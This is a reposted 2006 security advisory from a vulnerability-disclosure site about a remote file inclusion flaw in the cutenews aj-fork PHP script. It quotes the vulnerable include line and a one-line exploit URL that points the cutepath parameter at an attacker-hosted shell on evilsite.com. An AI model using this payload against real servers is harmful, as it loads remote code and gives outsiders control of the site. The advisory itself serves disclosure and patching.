Computer Security

Security Advisory: cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  BTSaveMySql 1.2 (acces to config files)

  Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability

  EasyPage Portal ( all ver )SQL Injection

From:MILW0RM <submit_(at)_milw0rm.com>
Date:06.12.2006
Subject:cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

=================================================================================
==========================
DeltasecurityTEAM
www.Deltasecurity.ir
=================================================================================
==========================
* Portal Name : cutenews aj-fork

* Class = Remote File Inclusion ;

* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Tanha )

---------------------------------------------------------------------------------
-------------------------
- Vulnerable Code
--------------------

   include($cutepath.'/inc/plugins.php');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:
   http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?

---------------------------------------------------------------------------------
-------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru